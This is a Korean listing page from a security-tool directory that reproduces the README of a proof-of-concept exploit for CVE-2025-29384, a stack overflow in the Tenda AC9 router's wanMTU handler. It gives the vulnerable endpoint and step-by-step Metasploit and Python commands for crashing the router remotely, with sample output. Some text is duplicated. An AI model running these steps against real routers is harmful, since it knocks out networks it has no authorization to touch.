Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-29384 — POC for CVE-2025-29384 | Kitploit
도구/GitHubGitHub/fomovet/cve-2025-29384
Embedded Systems SecurityExploit FrameworksIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingHardware & IoT SecurityLearning & EducationRed TeamingBinary Exploitation
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
fomovet/cve-2025-29384

cve-2025-29384

POC for CVE-2025-29384

저장소 보기

CVE-2025-29384 개념 증명 익스플로잇

개요

이 저장소는 Tenda AC9 라우터(펌웨어 버전 V15.03.05.14_multi)에서 발견된 심각한 스택 기반 버퍼 오버플로우 취약점인 CVE-2025-29384에 대한 고급 개념 증명(PoC) 익스플로잇을 포함합니다. 이 취약점은 인증되지 않은 원격 공격자가 라우터의 웹 서버를 다운시키고(서비스 거부, DoS) 잠재적으로 임의 코드를 실행할 수 있게 합니다(원격 코드 실행, RCE).

이 프로젝트의 목적은 익스플로잇 개발 기술을 시연하고, 사이버보안 커뮤니티에 기여하며, 사이버보안 장학금과 같은 학술 평가를 위한 교육적 전시를 제공하는 것입니다. 이 저장소는 Tenda AC9 라우터(펌웨어 버전 V15.03.05.14_multi)에서 발견된 심각한 스택 기반 버퍼 오버플로우 취약점인 CVE-2025-29384에 대한 고급 개념 증명(PoC) 익스플로잇을 포함합니다. 이 취약점은 인증되지 않은 원격 공격자가 라우터의 웹 서버를 다운시키고(서비스 거부, DoS) 잠재적으로 임의 코드를 실행할 수 있게 합니다(원격 코드 실행, RCE).

이 프로젝트의 목적은 익스플로잇 개발 기술을 시연하고, 사이버보안 커뮤니티에 기여하며, 사이버보안 장학금과 같은 학술 평가를 위한 교육적 전시를 제공하는 것입니다.

취약점 세부 정보

CVE 설명

CVE-2025-29384는 Tenda AC9 라우터의 웹 관리 인터페이스, 특히 다음 엔드포인트에 영향을 미칩니다:

root@kitploit:~
/goform/AdvSetMacMtuWan

이 취약점은 HTTP POST 요청을 통해 처리되는 wanMTU 매개변수에 대한 부적절한 경계 검사로 인해 존재합니다. 입력이 검증 없이 고정 크기 스택 버퍼에 복사되어 전형적인 스택 기반 버퍼 오버플로우가 발생합니다.

영향

  • 서비스 거부(DoS): 라우터의 HTTP 서버를 충돌시켜 재부팅할 때까지 응답하지 않도록 만듭니다.
  • 잠재적 RCE: 공격자는 반환 주소를 덮어쓰고 라우터의 MIPS 기반 아키텍처에서 임의 코드를 실행할 수 있습니다.
  • 인증 불필요: 인증 없이 원격으로 취약점을 트리거할 수 있어 심각도가 높아집니다.

기술 분석

취약 함수(가상 재구성)는 다음과 같은 구조를 가집니다:

root@kitploit:~
void process_mtu(char *input) {
    char buffer[256];  // Fixed-size stack buffer
    strcpy(buffer, input);  // No length check, causes overflow
    // Process MTU value...
}

공격자가 대형 페이로드(예: 1024+ 바이트)를 보내면 함수의 반환 주소를 포함한 인접 메모리를 덮어써 잠재적으로 코드 실행으로 이어집니다.

CVSS v3.1 점수: 9.8 (Critical)

영향을 받는 장치

Tenda AC9는 듀얼 밴드 무선 라우터로 다음과 같은 사양을 갖습니다:

  • CPU: Broadcom BCM4708 (MIPS 74Kc, 듀얼 코어, ~1 GHz)
  • RAM: 128 MB
  • 플래시: 16 MB
  • Wi-Fi: 듀얼 밴드 802.11ac (AC1200)
  • 포트: 1x 기가비트 WAN, 4x 기가비트 LAN
  • 펌웨어: V15.03.05.14_multi (취약점 확인됨)

공개 타임라인

  • 2025년 3월 14일 – CVE-2025-29384가 NVD/MITRE에 게시됨.
  • 2025년 3월 17일 – 본 PoC 개발 및 테스트 완료.
  • 2025년 3월 17일 – 현재까지 Tenda의 공식 패치 없음.

PoC 익스플로잇 세부 정보

Ruby Metasploit 모듈

이 저장소는 CVE-2025-29384에 대한 Ruby 기반 Metasploit 모듈도 포함합니다. 이 모듈은 Metasploit 프레임워크와 원활하게 통합되어 msfconsole을 사용하여 취약점을 익스플로잇할 수 있습니다.

Ruby 모듈 사용 방법

1단계: 모듈 다운로드

root@kitploit:~
git clone https://github.com/Otsmane-Ahmed/cve-2025-29384-poc
cd cve-2025-29384-poc

2단계: 모듈을 Metasploit에 복사

Ruby 모듈 파일을 찾아 Metasploit의 익스플로잇 디렉토리로 복사하세요:

root@kitploit:~
cp tenda_ac9_stack_overflow.rb ~/.msf4/modules/exploits/linux/http/

참고: 디렉토리가 없으면 만드세요:

root@kitploit:~
mkdir -p ~/.msf4/modules/exploits/linux/http/

3단계: Metasploit 실행

Metasploit 프레임워크를 시작하세요:

root@kitploit:~
msfconsole

모듈을 로드하세요:

root@kitploit:~
use exploit/linux/http/tenda_ac9_stack_overflow

4단계: 익스플로잇 구성 및 실행

대상 IP 주소를 설정하세요:

root@kitploit:~
set RHOSTS <target_ip>

페이로드 크기를 설정하세요 (선택사항, 기본값은 1024):

root@kitploit:~
set PAYLOAD_SIZE 2048

익스플로잇을 실행하세요:

root@kitploit:~
run

예시 출력

root@kitploit:~
[*] Targeting Tenda AC9 at 192.168.0.1:80...
[*] Sending payload of size 2048...
[+] Payload sent successfully!
[*] Response: HTTP/1.1 200 OK...

예상 결과

성공: 라우터의 웹 서버가 충돌하여 서비스 거부(DoS) 상태가 발생합니다.
실패: 라우터가 계속 작동하며, 이는 취약하지 않거나 패치된 펌웨어 버전이 실행 중임을 나타냅니다.

익스플로잇 개요

이 PoC는 Python 기반 익스플로잇으로, /goform/AdvSetMacMtuWan에 대형 입력을 보내 버퍼 오버플로우를 트리거하여 웹 서버를 충돌시키고 RCE 가능성을 보여줍니다.

테스트 환경

  • 운영 체제: Kali Linux
  • Python 버전: 3.x
  • 테스트 장치: Tenda AC9 (펌웨어 V15.03.05.14_multi)

기능

멀티스레딩 – 안정성을 위해 여러 동시 익스플로잇 시도를 실행합니다. 동적 페이로드 – 무작위 base64 인코딩 공격 문자열을 생성합니다. 로깅 – 구조화된 디버깅을 위해 Python의 로깅 모듈을 사용합니다. 사용자 정의 가능한 매개변수 – 대상 IP, 페이로드 크기, 스레드 수를 조정합니다.

익스플로잇 개요

이 PoC는 Python 기반 익스플로잇으로, /goform/AdvSetMacMtuWan에 대형 입력을 보내 버퍼 오버플로우를 트리거하여 웹 서버를 충돌시킵니다.

사용법

사전 요구 사항

  • Python 3.x
  • 펌웨어 V15.03.05.14_multi가 설치된 Tenda AC9 라우터

익스플로잇 실행

root@kitploit:~
python poc.py --target <router_ip> --size 2048 --threads 10
인수:
인수설명
--target라우터 IP (기본값: 192.168.0.1)

예시 출력

root@kitploit:~
[+] CVE-2025-29384 Exploit Engine
[INFO] Target: 192.168.0.1
[INFO] Sending payload (2048 bytes)...
[WARNING] Target timeout - possible crash!
[INFO] Exploit sequence completed.

예상 결과

성공: 라우터의 웹 인터페이스가 응답하지 않게 됩니다(DoS 상태). 실패: 라우터가 여전히 응답합니다(취약하지 않거나 잘못된 펌웨어).

확인

익스플로잇이 라우터를 성공적으로 충돌시켰는지 확인하려면 웹 인터페이스를 다시 로드해 보세요. 응답하지 않으면 공격이 성공한 것입니다. 추가 분석을 위해 네트워크 로그에서 연결 끊김을 확인하거나 ping을 사용하여 장치 응답성을 확인하세요.

면책 조항

이 프로젝트는 교육 및 윤리적 해킹 목적으로만 사용됩니다. 이 익스플로잇을 무단으로 사용하는 것은 불법입니다. 작성자는 이 코드로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.

Otsmane Ahmed가 ❤️로 개발함 이 프로젝트는 교육 및 윤리적 해킹 목적으로만 사용됩니다. 이 익스플로잇을 무단으로 사용하는 것은 불법입니다. 작성자는 이 코드로 인한 오용 또는 손해에 대해 책임을 지지 않습니다.

라이선스

이 프로젝트는 MIT 라이선스 하에 배포됩니다.

도구 다운로드
지표값
공격 벡터네트워크
공격 복잡도낮음
필요 권한없음
사용자 상호작용없음
기밀성 영향높음
무결성 영향높음
가용성 영향높음
--size
페이로드 크기(바이트) (기본값: 1024)
--threads동시 스레드 수 (기본값: 5)